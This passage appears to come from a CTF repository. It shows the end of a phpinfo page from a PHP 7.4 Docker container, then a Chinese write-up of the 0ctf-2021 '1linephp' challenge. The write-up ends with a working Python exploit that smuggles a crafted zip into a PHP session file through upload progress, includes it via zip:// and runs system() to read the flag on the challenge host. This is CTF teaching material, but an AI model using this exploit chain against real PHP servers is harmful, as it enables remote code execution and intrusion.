540 | <h2><a name="module_tokenizer">tokenizer</a></h2>
541 | <table>
542 | <tr><td class="e">Tokenizer Support </td><td class="v">enabled </td></tr>
543 | </table>
544 | <h2><a name="module_xml">xml</a></h2>
545 | <table>
546 | <tr><td class="e">XML Support </td><td class="v">active </td></tr>
547 | <tr><td class="e">XML Namespace Support </td><td class="v">active </td></tr>
548 | <tr><td class="e">libxml2 Version </td><td class="v">2.9.4 </td></tr>
549 | </table>
550 | <h2><a name="module_xmlreader">xmlreader</a></h2>
551 | <table>
552 | <tr><td class="e">XMLReader </td><td class="v">enabled </td></tr>
553 | </table>
554 | <h2><a name="module_xmlwriter">xmlwriter</a></h2>
555 | <table>
556 | <tr><td class="e">XMLWriter </td><td class="v">enabled </td></tr>
557 | </table>
558 | <h2><a name="module_zip">zip</a></h2>
559 | <table>
560 | <tr><td class="e">Zip </td><td class="v">enabled </td></tr>
561 | <tr><td class="e">Zip version </td><td class="v">1.15.6 </td></tr>
562 | <tr><td class="e">Libzip headers version </td><td class="v">1.5.1 </td></tr>
563 | <tr><td class="e">Libzip library version </td><td class="v">1.5.1 </td></tr>
564 | </table>
565 | <h2><a name="module_zlib">zlib</a></h2>
566 | <table>
567 | <tr class="h"><th>ZLib Support</th><th>enabled</th></tr>
568 | <tr><td class="e">Stream Wrapper </td><td class="v">compress.zlib:// </td></tr>
569 | <tr><td class="e">Stream Filter </td><td class="v">zlib.inflate, zlib.deflate </td></tr>
570 | <tr><td class="e">Compiled Version </td><td class="v">1.2.11 </td></tr>
571 | <tr><td class="e">Linked Version </td><td class="v">1.2.11 </td></tr>
572 | </table>
573 | <table>
574 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
575 | <tr><td class="e">zlib.output_compression</td><td class="v">Off</td><td class="v">Off</td></tr>
576 | <tr><td class="e">zlib.output_compression_level</td><td class="v">-1</td><td class="v">-1</td></tr>
577 | <tr><td class="e">zlib.output_handler</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
578 | </table>
579 | <h2>Additional Modules</h2>
580 | <table>
581 | <tr class="h"><th>Module Name</th></tr>
582 | </table>
583 | <h2>Environment</h2>
584 | <table>
585 | <tr class="h"><th>Variable</th><th>Value</th></tr>
586 | <tr><td class="e">HOSTNAME </td><td class="v">0699e883b740 </td></tr>
587 | <tr><td class="e">PHP_VERSION </td><td class="v">7.4.11 </td></tr>
588 | <tr><td class="e">APACHE_CONFDIR </td><td class="v">/etc/apache2 </td></tr>
589 | <tr><td class="e">PHP_MD5 </td><td class="v"><i>no value</i> </td></tr>
590 | <tr><td class="e">PHP_INI_DIR </td><td class="v">/usr/local/etc/php </td></tr>
591 | <tr><td class="e">GPG_KEYS </td><td class="v">42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312 </td></tr>
592 | <tr><td class="e">PHP_LDFLAGS </td><td class="v">-Wl,-O1 -pie </td></tr>
593 | <tr><td class="e">PWD </td><td class="v">/var/www/html </td></tr>
594 | <tr><td class="e">APACHE_LOG_DIR </td><td class="v">/var/log/apache2 </td></tr>
595 | <tr><td class="e">LANG </td><td class="v">C </td></tr>
596 | <tr><td class="e">PHP_SHA256 </td><td class="v">5d31675a9b9c21b5bd03389418218c30b26558246870caba8eb54f5856e2d6ce </td></tr>
597 | <tr><td class="e">APACHE_PID_FILE </td><td class="v">/var/run/apache2/apache2.pid </td></tr>
598 | <tr><td class="e">PHPIZE_DEPS </td><td class="v">autoconf 		dpkg-dev 		file 		g++ 		gcc 		libc-dev 		make 		pkg-config 		re2c </td></tr>
599 | <tr><td class="e">PHP_URL </td><td class="v">https://www.php.net/distributions/php-7.4.11.tar.xz </td></tr>
600 | <tr><td class="e">APACHE_RUN_GROUP </td><td class="v">www-data </td></tr>
601 | <tr><td class="e">APACHE_LOCK_DIR </td><td class="v">/var/lock/apache2 </td></tr>
602 | <tr><td class="e">PHP_EXTRA_CONFIGURE_ARGS </td><td class="v">--with-apxs2 --disable-cgi </td></tr>
603 | <tr><td class="e">SHLVL </td><td class="v">0 </td></tr>
604 | <tr><td class="e">PHP_CFLAGS </td><td class="v">-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 </td></tr>
605 | <tr><td class="e">APACHE_RUN_DIR </td><td class="v">/var/run/apache2 </td></tr>
606 | <tr><td class="e">APACHE_ENVVARS </td><td class="v">/etc/apache2/envvars </td></tr>
607 | <tr><td class="e">APACHE_RUN_USER </td><td class="v">www-data </td></tr>
608 | <tr><td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
609 | <tr><td class="e">PHP_EXTRA_BUILD_DEPS </td><td class="v">apache2-dev </td></tr>
610 | <tr><td class="e">PHP_ASC_URL </td><td class="v">https://www.php.net/distributions/php-7.4.11.tar.xz.asc </td></tr>
611 | <tr><td class="e">PHP_CPPFLAGS </td><td class="v">-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 </td></tr>
612 | </table>
613 | <h2>PHP Variables</h2>
614 | <table>
615 | <tr class="h"><th>Variable</th><th>Value</th></tr>
616 | <tr><td class="e">$_SERVER['HTTP_HOST']</td><td class="v">127.0.0.1</td></tr>
617 | <tr><td class="e">$_SERVER['HTTP_USER_AGENT']</td><td class="v">curl/7.64.0</td></tr>
618 | <tr><td class="e">$_SERVER['HTTP_ACCEPT']</td><td class="v">*/*</td></tr>
619 | <tr><td class="e">$_SERVER['PATH']</td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</td></tr>
620 | <tr><td class="e">$_SERVER['SERVER_SIGNATURE']</td><td class="v">&lt;address&gt;Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80&lt;/address&gt;
621 | </td></tr>
622 | <tr><td class="e">$_SERVER['SERVER_SOFTWARE']</td><td class="v">Apache/2.4.38 (Debian)</td></tr>
623 | <tr><td class="e">$_SERVER['SERVER_NAME']</td><td class="v">127.0.0.1</td></tr>
624 | <tr><td class="e">$_SERVER['SERVER_ADDR']</td><td class="v">127.0.0.1</td></tr>
625 | <tr><td class="e">$_SERVER['SERVER_PORT']</td><td class="v">80</td></tr>
626 | <tr><td class="e">$_SERVER['REMOTE_ADDR']</td><td class="v">127.0.0.1</td></tr>
627 | <tr><td class="e">$_SERVER['DOCUMENT_ROOT']</td><td class="v">/var/www/html</td></tr>
628 | <tr><td class="e">$_SERVER['REQUEST_SCHEME']</td><td class="v">http</td></tr>
629 | <tr><td class="e">$_SERVER['CONTEXT_PREFIX']</td><td class="v"><i>no value</i></td></tr>
630 | <tr><td class="e">$_SERVER['CONTEXT_DOCUMENT_ROOT']</td><td class="v">/var/www/html</td></tr>
631 | <tr><td class="e">$_SERVER['SERVER_ADMIN']</td><td class="v">webmaster@localhost</td></tr>
632 | <tr><td class="e">$_SERVER['SCRIPT_FILENAME']</td><td class="v">/var/www/html/phpinfo.php</td></tr>
633 | <tr><td class="e">$_SERVER['REMOTE_PORT']</td><td class="v">40012</td></tr>
634 | <tr><td class="e">$_SERVER['GATEWAY_INTERFACE']</td><td class="v">CGI/1.1</td></tr>
635 | <tr><td class="e">$_SERVER['SERVER_PROTOCOL']</td><td class="v">HTTP/1.1</td></tr>
636 | <tr><td class="e">$_SERVER['REQUEST_METHOD']</td><td class="v">GET</td></tr>
637 | <tr><td class="e">$_SERVER['QUERY_STRING']</td><td class="v"><i>no value</i></td></tr>
638 | <tr><td class="e">$_SERVER['REQUEST_URI']</td><td class="v">/phpinfo.php</td></tr>
639 | <tr><td class="e">$_SERVER['SCRIPT_NAME']</td><td class="v">/phpinfo.php</td></tr>
640 | <tr><td class="e">$_SERVER['PHP_SELF']</td><td class="v">/phpinfo.php</td></tr>
641 | <tr><td class="e">$_SERVER['REQUEST_TIME_FLOAT']</td><td class="v">1625156291.3649</td></tr>
642 | <tr><td class="e">$_SERVER['REQUEST_TIME']</td><td class="v">1625156291</td></tr>
643 | <tr><td class="e">$_SERVER['argv']</td><td class="v"><pre>Array
644 | (
645 | )
646 | </pre></td></tr>
647 | <tr><td class="e">$_SERVER['argc']</td><td class="v">0</td></tr>
648 | <tr><td class="e">$_ENV['HOSTNAME']</td><td class="v">0699e883b740</td></tr>
649 | <tr><td class="e">$_ENV['PHP_VERSION']</td><td class="v">7.4.11</td></tr>
650 | <tr><td class="e">$_ENV['APACHE_CONFDIR']</td><td class="v">/etc/apache2</td></tr>
651 | <tr><td class="e">$_ENV['PHP_MD5']</td><td class="v"><i>no value</i></td></tr>
652 | <tr><td class="e">$_ENV['PHP_INI_DIR']</td><td class="v">/usr/local/etc/php</td></tr>
653 | <tr><td class="e">$_ENV['GPG_KEYS']</td><td class="v">42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312</td></tr>
654 | <tr><td class="e">$_ENV['PHP_LDFLAGS']</td><td class="v">-Wl,-O1 -pie</td></tr>
655 | <tr><td class="e">$_ENV['PWD']</td><td class="v">/var/www/html</td></tr>
656 | <tr><td class="e">$_ENV['APACHE_LOG_DIR']</td><td class="v">/var/log/apache2</td></tr>
657 | <tr><td class="e">$_ENV['LANG']</td><td class="v">C</td></tr>
658 | <tr><td class="e">$_ENV['PHP_SHA256']</td><td class="v">5d31675a9b9c21b5bd03389418218c30b26558246870caba8eb54f5856e2d6ce</td></tr>
659 | <tr><td class="e">$_ENV['APACHE_PID_FILE']</td><td class="v">/var/run/apache2/apache2.pid</td></tr>
660 | <tr><td class="e">$_ENV['PHPIZE_DEPS']</td><td class="v">autoconf 		dpkg-dev 		file 		g++ 		gcc 		libc-dev 		make 		pkg-config 		re2c</td></tr>
661 | <tr><td class="e">$_ENV['PHP_URL']</td><td class="v">https://www.php.net/distributions/php-7.4.11.tar.xz</td></tr>
662 | <tr><td class="e">$_ENV['APACHE_RUN_GROUP']</td><td class="v">www-data</td></tr>
663 | <tr><td class="e">$_ENV['APACHE_LOCK_DIR']</td><td class="v">/var/lock/apache2</td></tr>
664 | <tr><td class="e">$_ENV['PHP_EXTRA_CONFIGURE_ARGS']</td><td class="v">--with-apxs2 --disable-cgi</td></tr>
665 | <tr><td class="e">$_ENV['SHLVL']</td><td class="v">0</td></tr>
666 | <tr><td class="e">$_ENV['PHP_CFLAGS']</td><td class="v">-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64</td></tr>
667 | <tr><td class="e">$_ENV['APACHE_RUN_DIR']</td><td class="v">/var/run/apache2</td></tr>
668 | <tr><td class="e">$_ENV['APACHE_ENVVARS']</td><td class="v">/etc/apache2/envvars</td></tr>
669 | <tr><td class="e">$_ENV['APACHE_RUN_USER']</td><td class="v">www-data</td></tr>
670 | <tr><td class="e">$_ENV['PATH']</td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</td></tr>
671 | <tr><td class="e">$_ENV['PHP_EXTRA_BUILD_DEPS']</td><td class="v">apache2-dev</td></tr>
672 | <tr><td class="e">$_ENV['PHP_ASC_URL']</td><td class="v">https://www.php.net/distributions/php-7.4.11.tar.xz.asc</td></tr>
673 | <tr><td class="e">$_ENV['PHP_CPPFLAGS']</td><td class="v">-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64</td></tr>
674 | </table>
675 | <hr />
676 | <h1>PHP Credits</h1>
677 | <table>
678 | <tr class="h"><th>PHP Group</th></tr>
679 | <tr><td class="e">Thies C. Arntzen, Stig Bakken, Shane Caraveo, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski </td></tr>
680 | </table>
681 | <table>
682 | <tr class="h"><th>Language Design &amp; Concept</th></tr>
683 | <tr><td class="e">Andi Gutmans, Rasmus Lerdorf, Zeev Suraski, Marcus Boerger </td></tr>
684 | </table>
685 | <table>
686 | <tr class="h"><th colspan="2">PHP Authors</th></tr>
687 | <tr class="h"><th>Contribution</th><th>Authors</th></tr>
688 | <tr><td class="e">Zend Scripting Language Engine </td><td class="v">Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Marcus Boerger, Dmitry Stogov, Xinchen Hui, Nikita Popov </td></tr>
689 | <tr><td class="e">Extension Module API </td><td class="v">Andi Gutmans, Zeev Suraski, Andrei Zmievski </td></tr>
690 | <tr><td class="e">UNIX Build and Modularization </td><td class="v">Stig Bakken, Sascha Schumann, Jani Taskinen, Peter Kokot </td></tr>
691 | <tr><td class="e">Windows Support </td><td class="v">Shane Caraveo, Zeev Suraski, Wez Furlong, Pierre-Alain Joye, Anatol Belski, Kalle Sommer Nielsen </td></tr>
692 | <tr><td class="e">Server API (SAPI) Abstraction Layer </td><td class="v">Andi Gutmans, Shane Caraveo, Zeev Suraski </td></tr>
693 | <tr><td class="e">Streams Abstraction Layer </td><td class="v">Wez Furlong, Sara Golemon </td></tr>
694 | <tr><td class="e">PHP Data Objects Layer </td><td class="v">Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky </td></tr>
695 | <tr><td class="e">Output Handler </td><td class="v">Zeev Suraski, Thies C. Arntzen, Marcus Boerger, Michael Wallner </td></tr>
696 | <tr><td class="e">Consistent 64 bit support </td><td class="v">Anthony Ferrara, Anatol Belski </td></tr>
697 | </table>
698 | <table>
699 | <tr class="h"><th colspan="2">SAPI Modules</th></tr>
700 | <tr class="h"><th>Contribution</th><th>Authors</th></tr>
701 | <tr><td class="e">Apache 2.0 Handler </td><td class="v">Ian Holsman, Justin Erenkrantz (based on Apache 2.0 Filter code) </td></tr>
702 | <tr><td class="e">CGI / FastCGI </td><td class="v">Rasmus Lerdorf, Stig Bakken, Shane Caraveo, Dmitry Stogov </td></tr>
703 | <tr><td class="e">CLI </td><td class="v">Edin Kadribasic, Marcus Boerger, Johannes Schlueter, Moriyoshi Koizumi, Xinchen Hui </td></tr>
704 | <tr><td class="e">Embed </td><td class="v">Edin Kadribasic </td></tr>
705 | <tr><td class="e">FastCGI Process Manager </td><td class="v">Andrei Nigmatulin, dreamcat4, Antony Dovgal, Jerome Loyet </td></tr>
706 | <tr><td class="e">litespeed </td><td class="v">George Wang </td></tr>
707 | <tr><td class="e">phpdbg </td><td class="v">Felipe Pena, Joe Watkins, Bob Weinand </td></tr>
708 | </table>
709 | <table>
710 | <tr class="h"><th colspan="2">Module Authors</th></tr>
711 | <tr class="h"><th>Module</th><th>Authors</th></tr>
712 | <tr><td class="e">BC Math </td><td class="v">Andi Gutmans </td></tr>
713 | <tr><td class="e">Bzip2 </td><td class="v">Sterling Hughes </td></tr>
714 | <tr><td class="e">Calendar </td><td class="v">Shane Caraveo, Colin Viebrock, Hartmut Holzgraefe, Wez Furlong </td></tr>
715 | <tr><td class="e">COM and .Net </td><td class="v">Wez Furlong </td></tr>
716 | <tr><td class="e">ctype </td><td class="v">Hartmut Holzgraefe </td></tr>
717 | <tr><td class="e">cURL </td><td class="v">Sterling Hughes </td></tr>
718 | <tr><td class="e">Date/Time Support </td><td class="v">Derick Rethans </td></tr>
719 | <tr><td class="e">DB-LIB (MS SQL, Sybase) </td><td class="v">Wez Furlong, Frank M. Kromann, Adam Baratz </td></tr>
720 | <tr><td class="e">DBA </td><td class="v">Sascha Schumann, Marcus Boerger </td></tr>
721 | <tr><td class="e">DOM </td><td class="v">Christian Stocker, Rob Richards, Marcus Boerger </td></tr>
722 | <tr><td class="e">enchant </td><td class="v">Pierre-Alain Joye, Ilia Alshanetsky </td></tr>
723 | <tr><td class="e">EXIF </td><td class="v">Rasmus Lerdorf, Marcus Boerger </td></tr>
724 | <tr><td class="e">FFI </td><td class="v">Dmitry Stogov </td></tr>
725 | <tr><td class="e">fileinfo </td><td class="v">Ilia Alshanetsky, Pierre Alain Joye, Scott MacVicar, Derick Rethans, Anatol Belski </td></tr>
726 | <tr><td class="e">Firebird driver for PDO </td><td class="v">Ard Biesheuvel </td></tr>
727 | <tr><td class="e">FTP </td><td class="v">Stefan Esser, Andrew Skalski </td></tr>
728 | <tr><td class="e">GD imaging </td><td class="v">Rasmus Lerdorf, Stig Bakken, Jim Winstead, Jouni Ahto, Ilia Alshanetsky, Pierre-Alain Joye, Marcus Boerger </td></tr>
729 | <tr><td class="e">GetText </td><td class="v">Alex Plotnick </td></tr>
730 | <tr><td class="e">GNU GMP support </td><td class="v">Stanislav Malyshev </td></tr>
731 | <tr><td class="e">Iconv </td><td class="v">Rui Hirokawa, Stig Bakken, Moriyoshi Koizumi </td></tr>
732 | <tr><td class="e">IMAP </td><td class="v">Rex Logan, Mark Musone, Brian Wang, Kaj-Michael Lang, Antoni Pamies Olive, Rasmus Lerdorf, Andrew Skalski, Chuck Hagenbuch, Daniel R Kalowsky </td></tr>
733 | <tr><td class="e">Input Filter </td><td class="v">Rasmus Lerdorf, Derick Rethans, Pierre-Alain Joye, Ilia Alshanetsky </td></tr>
734 | <tr><td class="e">Internationalization </td><td class="v">Ed Batutis, Vladimir Iordanov, Dmitry Lakhtyuk, Stanislav Malyshev, Vadim Savchuk, Kirti Velankar </td></tr>
735 | <tr><td class="e">JSON </td><td class="v">Jakub Zelenka, Omar Kilani, Scott MacVicar </td></tr>
736 | <tr><td class="e">LDAP </td><td class="v">Amitay Isaacs, Eric Warnke, Rasmus Lerdorf, Gerrit Thomson, Stig Venaas </td></tr>
737 | <tr><td class="e">LIBXML </td><td class="v">Christian Stocker, Rob Richards, Marcus Boerger, Wez Furlong, Shane Caraveo </td></tr>
738 | <tr><td class="e">Multibyte String Functions </td><td class="v">Tsukada Takuya, Rui Hirokawa </td></tr>
739 | <tr><td class="e">MySQL driver for PDO </td><td class="v">George Schlossnagle, Wez Furlong, Ilia Alshanetsky, Johannes Schlueter </td></tr>
740 | <tr><td class="e">MySQLi </td><td class="v">Zak Greant, Georg Richter, Andrey Hristov, Ulf Wendel </td></tr>
741 | <tr><td class="e">MySQLnd </td><td class="v">Andrey Hristov, Ulf Wendel, Georg Richter, Johannes Schlüter </td></tr>
742 | <tr><td class="e">OCI8 </td><td class="v">Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation </td></tr>
743 | <tr><td class="e">ODBC driver for PDO </td><td class="v">Wez Furlong </td></tr>
744 | <tr><td class="e">ODBC </td><td class="v">Stig Bakken, Andreas Karajannis, Frank M. Kromann, Daniel R. Kalowsky </td></tr>
745 | <tr><td class="e">Opcache </td><td class="v">Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Dmitry Stogov, Xinchen Hui </td></tr>
746 | <tr><td class="e">OpenSSL </td><td class="v">Stig Venaas, Wez Furlong, Sascha Kettler, Scott MacVicar </td></tr>
747 | <tr><td class="e">Oracle (OCI) driver for PDO </td><td class="v">Wez Furlong </td></tr>
748 | <tr><td class="e">pcntl </td><td class="v">Jason Greene, Arnaud Le Blanc </td></tr>
749 | <tr><td class="e">Perl Compatible Regexps </td><td class="v">Andrei Zmievski </td></tr>
750 | <tr><td class="e">PHP Archive </td><td class="v">Gregory Beaver, Marcus Boerger </td></tr>
751 | <tr><td class="e">PHP Data Objects </td><td class="v">Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky </td></tr>
752 | <tr><td class="e">PHP hash </td><td class="v">Sara Golemon, Rasmus Lerdorf, Stefan Esser, Michael Wallner, Scott MacVicar </td></tr>
753 | <tr><td class="e">Posix </td><td class="v">Kristian Koehntopp </td></tr>
754 | <tr><td class="e">PostgreSQL driver for PDO </td><td class="v">Edin Kadribasic, Ilia Alshanetsky </td></tr>
755 | <tr><td class="e">PostgreSQL </td><td class="v">Jouni Ahto, Zeev Suraski, Yasuo Ohgaki, Chris Kings-Lynne </td></tr>
756 | <tr><td class="e">Pspell </td><td class="v">Vlad Krupin </td></tr>
757 | <tr><td class="e">Readline </td><td class="v">Thies C. Arntzen </td></tr>
758 | <tr><td class="e">Reflection </td><td class="v">Marcus Boerger, Timm Friebe, George Schlossnagle, Andrei Zmievski, Johannes Schlueter </td></tr>
759 | <tr><td class="e">Sessions </td><td class="v">Sascha Schumann, Andrei Zmievski </td></tr>
760 | <tr><td class="e">Shared Memory Operations </td><td class="v">Slava Poliakov, Ilia Alshanetsky </td></tr>
761 | <tr><td class="e">SimpleXML </td><td class="v">Sterling Hughes, Marcus Boerger, Rob Richards </td></tr>
762 | <tr><td class="e">SNMP </td><td class="v">Rasmus Lerdorf, Harrie Hazewinkel, Mike Jackson, Steven Lawrance, Johann Hanne, Boris Lytochkin </td></tr>
763 | <tr><td class="e">SOAP </td><td class="v">Brad Lafountain, Shane Caraveo, Dmitry Stogov </td></tr>
764 | <tr><td class="e">Sockets </td><td class="v">Chris Vandomelen, Sterling Hughes, Daniel Beulshausen, Jason Greene </td></tr>
765 | <tr><td class="e">Sodium </td><td class="v">Frank Denis </td></tr>
766 | <tr><td class="e">SPL </td><td class="v">Marcus Boerger, Etienne Kneuss </td></tr>
767 | <tr><td class="e">SQLite 3.x driver for PDO </td><td class="v">Wez Furlong </td></tr>
768 | <tr><td class="e">SQLite3 </td><td class="v">Scott MacVicar, Ilia Alshanetsky, Brad Dewar </td></tr>
769 | <tr><td class="e">System V Message based IPC </td><td class="v">Wez Furlong </td></tr>
770 | <tr><td class="e">System V Semaphores </td><td class="v">Tom May </td></tr>
771 | <tr><td class="e">System V Shared Memory </td><td class="v">Christian Cartus </td></tr>
772 | <tr><td class="e">tidy </td><td class="v">John Coggeshall, Ilia Alshanetsky </td></tr>
773 | <tr><td class="e">tokenizer </td><td class="v">Andrei Zmievski, Johannes Schlueter </td></tr>
774 | <tr><td class="e">XML </td><td class="v">Stig Bakken, Thies C. Arntzen, Sterling Hughes </td></tr>
775 | <tr><td class="e">XMLReader </td><td class="v">Rob Richards </td></tr>
776 | <tr><td class="e">xmlrpc </td><td class="v">Dan Libby </td></tr>
777 | <tr><td class="e">XMLWriter </td><td class="v">Rob Richards, Pierre-Alain Joye </td></tr>
778 | <tr><td class="e">XSL </td><td class="v">Christian Stocker, Rob Richards </td></tr>
779 | <tr><td class="e">Zip </td><td class="v">Pierre-Alain Joye, Remi Collet </td></tr>
780 | <tr><td class="e">Zlib </td><td class="v">Rasmus Lerdorf, Stefan Roehrich, Zeev Suraski, Jade Nicoletti, Michael Wallner </td></tr>
781 | </table>
782 | <table>
783 | <tr class="h"><th colspan="2">PHP Documentation</th></tr>
784 | <tr><td class="e">Authors </td><td class="v">Mehdi Achour, Friedhelm Betz, Antony Dovgal, Nuno Lopes, Hannes Magnusson, Philip Olson, Georg Richter, Damien Seguy, Jakub Vrana, Adam Harvey </td></tr>
785 | <tr><td class="e">Editor </td><td class="v">Peter Cowburn </td></tr>
786 | <tr><td class="e">User Note Maintainers </td><td class="v">Daniel P. Brown, Thiago Henrique Pojda </td></tr>
787 | <tr><td class="e">Other Contributors </td><td class="v">Previously active authors, editors and other contributors are listed in the manual. </td></tr>
788 | </table>
789 | <table>
790 | <tr class="h"><th>PHP Quality Assurance Team</th></tr>
791 | <tr><td class="e">Ilia Alshanetsky, Joerg Behrens, Antony Dovgal, Stefan Esser, Moriyoshi Koizumi, Magnus Maatta, Sebastian Nohn, Derick Rethans, Melvyn Sopacua, Pierre-Alain Joye, Dmitry Stogov, Felipe Pena, David Soria Parra, Stanislav Malyshev, Julien Pauli, Stephen Zarkos, Anatol Belski, Remi Collet, Ferenc Kovacs </td></tr>
792 | </table>
793 | <table>
794 | <tr class="h"><th colspan="2">Websites and Infrastructure team</th></tr>
795 | <tr><td class="e">PHP Websites Team </td><td class="v">Rasmus Lerdorf, Hannes Magnusson, Philip Olson, Lukas Kahwe Smith, Pierre-Alain Joye, Kalle Sommer Nielsen, Peter Cowburn, Adam Harvey, Ferenc Kovacs, Levi Morrison </td></tr>
796 | <tr><td class="e">Event Maintainers </td><td class="v">Damien Seguy, Daniel P. Brown </td></tr>
797 | <tr><td class="e">Network Infrastructure </td><td class="v">Daniel P. Brown </td></tr>
798 | <tr><td class="e">Windows Infrastructure </td><td class="v">Alex Schoenmaker </td></tr>
799 | </table>
800 | <h2>PHP License</h2>
801 | <table>
802 | <tr class="v"><td>
803 | <p>
804 | This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file:  LICENSE
805 | </p>
806 | <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
807 | </p>
808 | <p>If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.
809 | </p>
810 | </td></tr>
811 | </table>
812 | </div></body></html>


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/writeup/1linephp_writeup.md:
--------------------------------------------------------------------------------
  1 | ## 1linephp
  2 | 
  3 | #### solution
  4 | 
  5 | ##### zip
  6 | 
  7 | php的zip extension使用的是libzip这个库，通过阅读libzip的源码可以发现，其解析zip文件的方式是从后往前的，先在文件末尾的一个范围内寻找EOCD的MAGIC，然后根据EOCD中的offset去读取CDH，最后根据CDH中的offset去读取压缩文件数据。
  8 | 
  9 | 这种解析方式使得可以在zip的开头和末尾以及各个部分之间插入多余的数据，只需对应地修改两个offset就可以让libzip正常解析。
 10 | 
 11 | 如果在zip_open时开启了ZIP_CHECKCONS这个选项，那么解析zip时的检查会更严格。
 12 | 
 13 | ###### 备注
 14 | 
 15 | 用 *zip* 工具修复offset: https://github.com/perfectblue/ctf-writeups/tree/master/2021/0ctf-2021-quals/onelinephp
 16 | 
 17 | 在与参赛选手的交流中发现，其实是可以搜到相关的信息的：
 18 | 
 19 | - https://gynvael.coldwind.pl/?id=523
 20 | - http://roverdoge.top
 21 | 
 22 | ##### session
 23 | 
 24 | PHP_SESSION_UPLOAD_PROGRESS: https://www.php.net/manual/zh/session.upload-progress.php
 25 | 
 26 | session.save_path: https://www.php.net/manual/zh/session.configuration.php#ini.session.save-path
 27 | 
 28 | 利用这个特性可以在文件名可控的session文件中插入一段可控的数据，具体细节已有不少文章分析过，不再赘述。
 29 | 
 30 | 除了竞争的做法以外，还可以用更稳定的做法。
 31 | 
 32 | > 当 [session.upload_progress.enabled](https://www.php.net/manual/zh/session.configuration.php#ini.session.upload-progress.enabled) INI 选项开启时，PHP 能够在每一个文件上传时监测上传进度。
 33 | 
 34 | 只要文件上传得慢一点，就可以让session文件中的上传进度信息保留得久一点，详见exp。
 35 | 
 36 | ##### CcL's exp
 37 | 
 38 | ```python
 39 | import requests
 40 | import socket
 41 | 
 42 | port = 50081
 43 | php_session_id = "dd9c6236c439f75b78cf6ef8d1efca31"
 44 | payload = b"ccl_PK\x03\x04\x14\x00\x00\x00\x08\x00\xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x1c\x00include.phpUT\t\x00\x03-<\xd5`-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00s\xb0\xb1/\xc8(PHM\xce\xc8WP\x89ww\r\x896\x88\xd5\x800\x0cc5\xad\xb9\x00PK\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x14\x00\x00\x00include.phpUT\x05\x00\x03-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Q\x00\x00\x00v\x00\x00\x00\x00\x00"
 45 | 
 46 | 
 47 | def exp():
 48 |     res = requests.get(
 49 |         f"http://111.186.59.2:{port}/",
 50 |         params={
 51 |             "yxxx": f"zip:///tmp/sess_{php_session_id}#include",
 52 |             "0": "system",
 53 |             "1": "cat /dd810fc36330c200a_flag/flag",
 54 |         },
 55 |     )
 56 |     print(res.text)
 57 | 
 58 | 
 59 | def build_http_request_packet(req: requests.PreparedRequest):
 60 |     packet = b""
 61 |     packet += f"{req.method} {req.path_url} HTTP/1.1\r\n".encode()
 62 |     for header, value in req.headers.items():
 63 |         packet += f"{header}: {value}\r\n".encode()
 64 |     packet += b"\r\n"
 65 |     if req.body is not None:
 66 |         if "Content-Length" in req.headers:
 67 |             if type(req.body) is str:
 68 |                 packet += req.body.encode()
 69 |             else:
 70 |                 packet += req.body
 71 |         else:
 72 |             for part in req.body:
 73 |                 packet += f"{len(part):x}\r\n".encode()
 74 |                 packet += f"{part}\r\n".encode()
 75 |             packet += b"0\r\n\r\n"
 76 |     return packet
 77 | 
 78 | 
 79 | def do_so():
 80 |     req = requests.Request(
 81 |         "POST",
 82 |         f"http://111.186.59.2:{port}/",
 83 |         headers={"Host": f"111.186.59.2:{port}"},
 84 |         cookies={"PHPSESSID": php_session_id},
 85 |         data={
 86 |             "PHP_SESSION_UPLOAD_PROGRESS": payload,
 87 |         },
 88 |         files={"file": ("simple.txt", b"ccl" * 4096)},
 89 |     )
 90 |     packet = build_http_request_packet(req.prepare())
 91 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 92 |     s.connect(("111.186.59.2", port))
 93 |     s.sendall(packet[:-8])
 94 |     exp()
 95 |     s.sendall(packet[-8:])
 96 |     s.close()
 97 | 
 98 | 
 99 | if __name__ == "__main__":
100 |     do_so()
101 | ```
102 | 
103 | #### unintended solution
104 | 
